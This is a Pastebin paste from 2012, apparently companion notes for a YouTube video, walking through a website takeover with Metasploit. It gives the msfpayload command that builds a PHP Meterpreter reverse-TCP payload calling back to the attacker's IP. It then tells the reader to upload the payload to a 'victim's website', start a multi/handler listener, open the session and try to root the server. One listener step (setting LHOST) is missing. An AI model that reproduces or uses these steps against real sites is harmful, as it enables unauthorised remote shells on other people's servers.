Hacking a Website with Metasploit

ZaraByte Jul 13th, 2012 28,343 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. First thing your going to need to do is figure a clever way to get local access to your victim's website.
  3. Steps:
  5. Step #1:
  6. Open a Terminal and type in:
  7. msfpayload php/meterpreter/reverse_tcp LHOST=YOURIPHERE LPORT=4444 R > filename.php
  8. You will need your External IP Address and possibly need to port forward if behind a router because the victims website might not
  9. be able to connect back to your if the router is blocking the port.
  11. Step #2:
  12. You will need to edit the php file you make it is saved in your Home folder for linux so whatever your linux login name it should be
  13. in that users home folder.
  14. You will need to edit this php file and ONLY! remove the # in front of the <?php there is a #<?php remove the # save it and upload it
  15. to your victims website.
  18. Step #3:
  19. Open a Terminal and type in:
  20. msfconsole
  21. Wait for msfconsole to load then type:
  22. use multi/handler
  23. press ENTER
  24. type:
  25. set PAYLOAD php/meterpreter/reverse_tcp
  26. press ENTER
  27. type:
  29. press ENTER
  30. Type: set LPORT 4444
  31. press ENTER
  32. type:
  33. exploit -z -j
  34. press ENTER
  36. now go to the victims website can run the php file you made on there website from your browser check the msfconsle !
  38. type:
  39. sessions
  40. If there are any sessions showing take not of the number under then ID in my case mine was 1 so i type
  41. sessions -i 1
  42. press ENTER
  43. BOOM!!! We got Meterpreter!!!
  44. from here you can run linux commands and possibly root the server if there is a local root exploit
  46. Your on your own from here!
  48. Enjoy!
  50. Theses are the steps for the following video on youtube:
  51. As I wasn't able to post this full thing into the Discription !
  53. Check out
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand